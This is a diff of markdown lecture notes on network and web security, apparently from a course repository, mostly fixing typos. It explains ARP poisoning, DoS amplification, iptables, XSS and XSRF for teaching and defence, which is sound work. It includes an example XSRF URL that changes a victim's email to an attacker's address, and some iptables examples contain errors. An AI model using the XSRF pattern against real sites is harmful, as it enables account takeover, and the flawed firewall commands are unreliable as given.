View File
@@ -7,18 +7,18 @@
![1647096411.png](img/1647096411.png) ![1647096411.png](img/1647096411.png)
- IP is connection-less and state-less - IP is connection-less and state-less
- Best effort service - Best effort service
- No delivery guarantee - No delivery guarantee
- No order guarantee - No order guarantee
- IPv4 No guaranteed security support - IPv4 No guaranteed security support
- IPv6 security support is guaranteed - IPSec - IPv6 security support is guaranteed - IPSec
#### IPSec #### IPSec
- Optional in IPv4, mandatory support in IPv6 - Optional in IPv4, mandatory support in IPv6
- Two major security mechanisms - Two major security mechanisms
- IP Authentication Header (AH) - IP Authentication Header (AH)
- IP Encapsulation Security Payload (ESP) - IP Encapsulation Security Payload (ESP)
- Does not contain any mechanisms to prevent traffic analysis - Does not contain any mechanisms to prevent traffic analysis
##### Encapsulation Security Payload ##### Encapsulation Security Payload
@@ -31,7 +31,7 @@
- Stores security parameters e.g. crypto protocol and keys - Stores security parameters e.g. crypto protocol and keys
- Established by Internet Security association and key management protocol (ISAKMP) during the Internet Key Exchange (IKE) handshake - Established by Internet Security association and key management protocol (ISAKMP) during the Internet Key Exchange (IKE) handshake
- Uses Diffie-Hellman for key exchange - Uses Diffie-Hellman for key exchange
- The SPI references the entry in a table that corresponds to this session’s parameters - The SPI references the entry in a table that corresponds to this session’s parameters
- ESP uses either *transport* or *tunnel* modes - ESP uses either *transport* or *tunnel* modes
@@ -60,14 +60,14 @@ Tunnel mode
#### ARP #### ARP
- ARP is a protocol used to obtain physical MAC addresses for given IPs - ARP is a protocol used to obtain physical MAC addresses for given IPs
- It is used prior to constructing IP and TCP packets for communication - It is used prior to constructing IP and TCP packets for communication
- Network layer - Network layer
![1647097704.png](img/1647097704.png) ![1647097704.png](img/1647097704.png)
##### ARP Cache Poisoning ##### ARP Cache Poisoning
- We can simply send an unrequested ARP reply, and overwrite the MAC address in a hosts ARP cache with our own - We can simply send an unrequested ARP reply, and overwrite the MAC address in a host’s ARP cache with our own
![1647097845.png](img/1647097845.png) ![1647097845.png](img/1647097845.png)
@@ -75,14 +75,14 @@ Tunnel mode
- Some OSs ignore unsolicited ARP requests, or can be configured to use ARP differently - Some OSs ignore unsolicited ARP requests, or can be configured to use ARP differently
- Some software, such as intrusion detection packages, will include ARP spoofing detection - Some software, such as intrusion detection packages, will include ARP spoofing detection
- Maintain a log of current MAC:IP assignments and ARP requests / replies - Maintain a log of current MAC:IP assignments and ARP requests / replies
#### DNS #### DNS
- DNS translates domain names into IP addresses - DNS translates domain names into IP addresses
- DNS packets are UDP - DNS packets are UDP
- Stateless on the transport layer - Stateless on the transport layer
- DNS resolvers will cache the IP for awhile - DNS resolvers will cache the IP for a while
##### DNS Spoofing ##### DNS Spoofing
@@ -99,24 +99,24 @@ Tunnel mode
### Denial of Service ### Denial of Service
- A denial of service attack is an attempt to make a machine or network resource unavaliable to its authorised / intended users - A denial of service attack is an attempt to make a machine or network resource unavailable to its authorised / intended users
- This will usually involve flooding a machine with enough requests that it can’t server its legitimate purpose - This will usually involve flooding a machine with enough requests that it can’t serve its legitimate purpose
- ping flood - ping flood
- A distributed denial of service occurs where there is more than one attacking machine - A distributed denial of service occurs where there is more than one attacking machine
#### TCP Syn Flooding #### TCP Syn Flooding
- Attacker initiates a genuine connection but then immediately breaks it - Attacker initiates a genuine connection but then immediately breaks it
- Attack never finishes 3-way handshake - Attack never finishes 3-way handshake
- Victim is busy with the timeout - Victim is busy with the timeout
- Attack initiates large number of syn requests - Attack initiates large number of syn requests
- Victim reaches it’s half-open connection limit - Victim reaches its half-open connection limit
![1647104111.png](img/1647104111.png) ![1647104111.png](img/1647104111.png)
#### Amplification Attacks #### Amplification Attacks
- Regular attacks are your bandwidth vs your targets - Regular attacks are your bandwidth vs your target’s
- Amplification attacks utilise some aspect of a network protocol to *increase the bandwidth* of an attack - Amplification attacks utilise some aspect of a network protocol to *increase the bandwidth* of an attack
![1647104236.png](img/1647104236.png) ![1647104236.png](img/1647104236.png)
@@ -136,26 +136,25 @@ Tunnel mode
![1647104517.png](img/1647104517.png) ![1647104517.png](img/1647104517.png)
- In an ideal world, all DNS resolvers would: - In an ideal world, all DNS resolvers would:
- Use an authorised list of requesters - Use an authorised list of requesters
- e.g. ISPs allowing requests from only their customers - e.g. ISPs allowing requests from only their customers
- Egress filtering - Egress filtering
- Many DNS servers are set up incorrectly, and will happily amplify your traffic - **Open resolvers** - Many DNS servers are set up incorrectly, and will happily amplify your traffic - **Open resolvers**
- Botnets maintain lists of these open resolvers and there are projects attempting to shut these down - Botnets maintain lists of these open resolvers and there are projects attempting to shut these down
##### NTP Amplification ##### NTP Amplification
- NTP is a protocol for synchronsing time between machines - NTP is a protocol for synchronising time between machines
- Extremely similar to DNS amplification - Extremely similar to DNS amplification
- `MON_GETLIST` request returns the list of the last 600 contacts - `MON_GETLIST` request returns the list of the last 600 contacts
- Gives 200x amplification - Gives 200x amplification
- `MON_GETLIST` is deprecated because of this attack - `MON_GETLIST` is deprecated because of this attack
##### Slow Loris ##### Slow Loris
- Opens numerous connections to a server - Opens numerous connections to a server
- Begin an HTTP request - Begin an HTTP request
- Send just enough traffic to stop the connection from closing - Send just enough traffic to stop the connection from closing
- Apache2 creates a new thread for each connection - Apache2 creates a new thread for each connection
- More connections slow the server down significantly - More connections slow the server down significantly
- The attack only sends bytes of data at a time making it extremely easy to do - The attack only sends bytes of data at a time making it extremely easy to do
+33 -33
View File
@@ -2,7 +2,7 @@
- A hardware and/or software system - A hardware and/or software system
- Prevents unauthorised access of packets from one network to another - Prevents unauthorised access of packets from one network to another
- All data leave any subnet must pass through it - All data leaving any subnet must pass through it
![1647287782.png](img/1647287782.png) ![1647287782.png](img/1647287782.png)
@@ -22,7 +22,7 @@
#### DMZ #### DMZ
- A demilitarised zone is a small subnet that separates exrternally facing services from the internal network - A demilitarised zone is a small subnet that separates externally facing services from the internal network
![1647288286.png](img/1647288286.png) ![1647288286.png](img/1647288286.png)
@@ -33,45 +33,45 @@
- Defends a network against parties accessing *internal services* - Defends a network against parties accessing *internal services*
- Can also restrict access from *inside to outside* services - Can also restrict access from *inside to outside* services
- Network Address Translation - Network Address Translation
- Hides the internal machines with private addresses - Hides the internal machines with private addresses
**Firewalls are not enough** **Firewalls are not enough**
- Cannot protect against attacks that bypass the firewall - Cannot protect against attacks that bypass the firewall
- e.g. tunneling - e.g. tunnelling
- Cannot protect against internal threats or insiders - Cannot protect against internal threats or insiders
- Might help a bit by egress filtering - Might help a bit by egress filtering
- Network firewalls cannot always protect against the transfer of virus-infected programs or files - Network firewalls cannot always protect against the transfer of virus-infected programs or files
#### Packet Filters #### Packet Filters
- Specify which packets are *allowed or dropped* - Specify which packets are *allowed or dropped*
- Rules based on: - Rules based on:
- Source / destination IP - Source / destination IP
- TCP / UDP port numbers - TCP / UDP port numbers
- Possible for both *inbound* and *outbound* traffic - Possible for both *inbound* and *outbound* traffic
- Can be implemented in a router by only examining packet headers (**IP / TCP**) - Can be implemented in a router by only examining packet headers (**IP / TCP**)
##### Packet Filter Rules ##### Packet Filter Rules
- Rule execution depends on implementation - Rule execution depends on implementation
- `IPTABLES`: **First** rule to match is applied - `IPTABLES`: **First** rule to match is applied
- `PF`: All rules are examined, **last** match is applied - `PF`: All rules are examined, **last** match is applied
- Rules are organised in *chains*, which are logical subgroups of rules - Rules are organised in *chains*, which are logical subgroups of rules
- Depending on the packet, different chains are activated - Depending on the packet, different chains are activated
###### IPTABLES ###### IPTABLES
- An application that provides access to the Linux firewall rule tables - An application that provides access to the Linux firewall rule tables
- Not actually a firewall, but configures the firewall - Not actually a firewall, but configures the firewall
- The firewall is mostly implemented as `netfilter` modules - The firewall is mostly implemented as `netfilter` modules
###### Tables and Chains ###### Tables and Chains
- `IPTABLES` uses tables to store chains - `IPTABLES` uses tables to store chains
- Default is the filtering table - Default is the filtering table
- Chains are ordered in lists of rules - Chains are ordered in lists of rules
- Rules match, or they don’t - Rules match, or they don’t
- Matches result in a **jump**, else we check the next rule. - Matches result in a **jump**, else we check the next rule.
![1647289401.png](img/1647289401.png) ![1647289401.png](img/1647289401.png)
@@ -79,7 +79,7 @@
Default policy on this chain is `DROP` Default policy on this chain is `DROP`
- There can be multiple chains per table - There can be multiple chains per table
- e.g. a `TCP` handling chain - e.g. a `TCP` handling chain
- Jumps can go to `ACCEPT`, `DROP`, `LOG` or another chain - Jumps can go to `ACCEPT`, `DROP`, `LOG` or another chain
- Complex behaviour can be built up - Complex behaviour can be built up
@@ -88,10 +88,10 @@ Default policy on this chain is `DROP`
##### Defaults ##### Defaults
- There are four built-in tables in `IPTABLES` - There are four built-in tables in `IPTABLES`
- Filter - Filter
- `NAT` - `NAT`
- Mangle - packet alteration - Mangle - packet alteration
- Raw - skips connection tracking - Raw - skips connection tracking
- The default table is the filtering table, including input, output and forward chains - The default table is the filtering table, including input, output and forward chains
![1647289692.png](img/1647289692.png) ![1647289692.png](img/1647289692.png)
@@ -105,14 +105,14 @@ $ iptables -A INPUT -i eht0 -p tcp --dport 80 -j ACCEPT
$ iptables -A OUTPUT -i eht0 -p tcp --sport 80 -j ACCEPT $ iptables -A OUTPUT -i eht0 -p tcp --sport 80 -j ACCEPT
``` ```
- Remember `http` requests are not sent from the client’s port 80, it is sent from a random high numbered port - Remember `http` requests are not sent from the client’s port 80; they are sent from a random high-numbered port
- This is how clients can have multiple web requests open at the same time - This is how clients can have multiple web requests open at the same time
##### Policies ##### Policies
- **Permissive** - allow everything by default except dangerous services - **Permissive** - allow everything by default except dangerous services
- Make a black list - Make a black list
- Easy to make a mistake or forget something - Easy to make a mistake or forget something
```bash ```bash
iptables -p INPUT ACCEPT iptables -p INPUT ACCEPT
@@ -124,8 +124,8 @@ iptables -A OUTPUT -p tcp --dport ssh -j DROP
``` ```
- **Restrictive** - block everything except designated useful services - **Restrictive** - block everything except designated useful services
- Make a white list - Make a white list
- More secure by default - More secure by default
```bash ```bash
iptables -p INPUT DROP iptables -p INPUT DROP
@@ -139,17 +139,17 @@ iptables -A OUTPUT -s 192.168.0.2 -j ACCEPT
#### Packet Filter Issues #### Packet Filter Issues
- Packet filters are simple, low-level and have high assurance - Packet filters are simple, low-level and have high assurance
- However they cannot: - However:
- Prevent attacks that employ application specific vulnerabilities - They cannot prevent attacks that employ application-specific vulnerabilities
- Do not support higher-level authentication schemes - Do not support higher-level authentication schemes
- Easy to accidentally allow or deny packets incorrectly - Easy to accidentally allow or deny packets incorrectly
### Stateful Packet Filters ### Stateful Packet Filters
- Understand requests and replies (`ACK/SYN`) - Understand requests and replies (`ACK/SYN`)
- Dynamically generate rules - Dynamically generate rules
- Based on what it sees from TCP handshakes (can be FTP or SSH etc) - Based on what it sees from TCP handshakes (can be FTP or SSH etc)
- Can support policies for a wider range or protocols - Can support policies for a wider range of protocols
- `IPTABLES` has a module for stateful packet filtering - `IPTABLES` has a module for stateful packet filtering
- Allow incoming / outgoing SSH connections - Allow incoming / outgoing SSH connections
@@ -166,7 +166,7 @@ iptables -A OUTPUT -s 192.168.0.2 -j ACCEPT
- Packet filters have limited criteria that allow data in and out - Packet filters have limited criteria that allow data in and out
- An application gateway considers the *application-layer* protocol that is in use - An application gateway considers the *application-layer* protocol that is in use
- For example if someone sends an `HTTP` request to port 22, it is blocked - For example if someone sends an `HTTP` request to port 22, it is blocked
##### Proxy Server ##### Proxy Server
@@ -184,11 +184,11 @@ iptables -A OUTPUT -s 192.168.0.2 -j ACCEPT
### Network Address Translation ### Network Address Translation
The shortage of IP addresses mean that most routers now perform NAT automatically The shortage of IP addresses means that most routers now perform NAT automatically
![1647290897.png](img/1647290897.png) ![1647290897.png](img/1647290897.png)
- The implicit advantage in NAT is that your machine is almost totally hidden from the internet - The implicit advantage in NAT is that your machine is almost totally hidden from the internet
- Only **established connections** are forwarded to your internal machine - Only **established connections** are forwarded to your internal machine
- Or, specific **port forwarding** rules - Or, specific **port forwarding** rules
- This prevents any unsolicited attacks on random ports, but no other types of attack - This prevents any unsolicited attacks on random ports, but no other types of attack
+33 -31
View File
@@ -1,10 +1,10 @@
# Internet Security # Internet Security
#### Internet Treat Models #### Internet Threat Models
- Different to other treat models: - Different to other threat models:
- The attacker isn’t in control of the network - The attacker isn’t in control of the network
- The attacker hasn’t got access to the target’s OS - The attacker hasn’t got access to the target’s OS
## Cookies ## Cookies
@@ -22,79 +22,81 @@
- **Persistent** - Expire at a given time - **Persistent** - Expire at a given time
- **Secure** - Can only be used over `HTTPS` - **Secure** - Can only be used over `HTTPS`
- `HTTPOnly` - Inaccessible to `js` - `HTTPOnly` - Inaccessible to `js`
- Makes it harder to steal - Makes it harder to steal
##### Third Party Cookies ##### Third Party Cookies
- Cookies are associated with the domains that produced them - Cookies are associated with the domains that produced them
- `amazon.com` cookies don’t go to `google.com` - `amazon.com` cookies don’t go to `google.com`
- Some websites include request to other domains, such as 3rd party advertisers - Some websites include requests to other domains, such as 3rd party advertisers
- These serve cookies *a lot* - These serve cookies *a lot*
- This is how advertiser companies know what ads you’ve been served and what adverts you’ve clicked on - This is how advertiser companies know what ads you’ve been served and what adverts you’ve clicked on
### Cookie Vulnerabilities ### Cookie Vulnerabilities
- How a website uses a cookies is up to the server - How a website uses a cookie is up to the server
- Many create a `SID` to authenticate users, for example to *keep me logged on* - Many create a `SID` to authenticate users, for example to *keep me logged on*
- Obtaining this cookie - *cookie stealing* - lets you **hijack** their session - Obtaining this cookie - *cookie stealing* - lets you **hijack** their session
- `HTTP` Cookies can be stolen simply by monitoring - `HTTP` Cookies can be stolen simply by monitoring
- `HTTPS` will require cross-site scripting attacks or DNS poisoning - `HTTPS` will require cross-site scripting attacks or DNS poisoning
#### Cross-site Scripting (XSS) #### Cross-site Scripting (XSS)
- A type of *injection attack*, similar in many ways to an SQL injection - A type of *injection attack*, similar in many ways to an SQL injection
- HTML is read by a browser and is a combination of content and structure - HTML is read by a browser and is a combination of content and structure
- If we can inject `html` structures into the content of a website, the browser will simply execute these - If we can inject `html` structures into the content of a website, the browser will simply execute these
- e.g. a `<script>` tag - e.g. a `<script>` tag
##### Reflected XSS ##### Reflected XSS
- A malicious URL that inserts an exploit directly into the page returned by a server - A malicious URL that inserts an exploit directly into the page returned by a server
- Consider a 404 page at some address - Consider a 404 page at some address
- If we embed code into the url - If we embed code into the url
- ![1647532522.png](img/1647532522.png)
- Modern browsers will throw up a warning - ![1647532522.png](img/1647532522.png)
- Modern browsers will throw up a warning
##### Persistent XSS ##### Persistent XSS
- Even worse, no need to trick people into clicking links - Even worse, no need to trick people into clicking links
- Any website that doesn’t properly sanitise `html` tags from user input is vulnerable - Any website that doesn’t properly sanitise `html` tags from user input is vulnerable
- Blog posts with comment sections are obvious targets - Blog posts with comment sections are obvious targets
- Forums, web comments, shopping reviews - Forums, web comments, shopping reviews
###### The Samy Worm ###### The Samy Worm
- In 2005 Samy Kamkar wrote an XSS-based attack on MySpace - In 2005 Samy Kamkar wrote an XSS-based attack on MySpace
- ![1647532776.png](img/1647532776.png)
- Fastest spreading virus of all time - ![1647532776.png](img/1647532776.png)
- Fastest spreading virus of all time
### Preventing XSS ### Preventing XSS
- Wesbites must aggressively escape html characters from *any* user input / output - Websites must aggressively escape HTML characters from *any* user input / output
1. Locate all positions in which a website handles untrusted data 1. Locate all positions in which a website handles untrusted data
2. Escape appropriately depending on type of input 2. Escape appropriately depending on type of input
- When you consider all of the things people input on interactive websites, this can be a rela problem - When you consider all of the things people input on interactive websites, this can be a real problem
- You also need to find all of the bizarre obfuscated versions of XSS - You also need to find all of the bizarre obfuscated versions of XSS
- Use an encoding library, which will handle all of these edge cases - Use an encoding library, which will handle all of these edge cases
### Cross site Request Forgery (XSRF) ### Cross site Request Forgery (XSRF)
- When a user puts in a `HTTP` request, they will also send any relevant session cookies - When a user puts in a `HTTP` request, they will also send any relevant session cookies
- e.g. an `SID` from having logged in - e.g. an `SID` from having logged in
- If the user has already authenticated, a malicious URl can then perform some action on their account - If the user has already authenticated, a malicious URL can then perform some action on their account
- `http://shop.com/account.php?act=editemail&e=attacker@mail.com` - `http://shop.com/account.php?act=editemail&e=attacker@mail.com`
#### XSRF in POST #### XSRF in POST
- Most websites use POST, this is little defence - Most websites use POST, this is little defence
- The phishing email just points to a convincing website with a malicious form on it - The phishing email just points to a convincing website with a malicious form on it
- ![1647534757.png](img/1647534757.png)
- ![1647534757.png](img/1647534757.png)
#### Preventing XSRF #### Preventing XSRF
- XSS vulenerabilties make XSRF a lot easier - XSS vulnerabilities make XSRF a lot easier
- Use **synchroniser tokens** - Use **synchroniser tokens**
- Each website form has a one-time token that the server validates when the form is submitted - Each website form has a one-time token that the server validates when the form is submitted
Loaded 100 of 103 files, more files were not shown because too many files have changed in this diff. Show more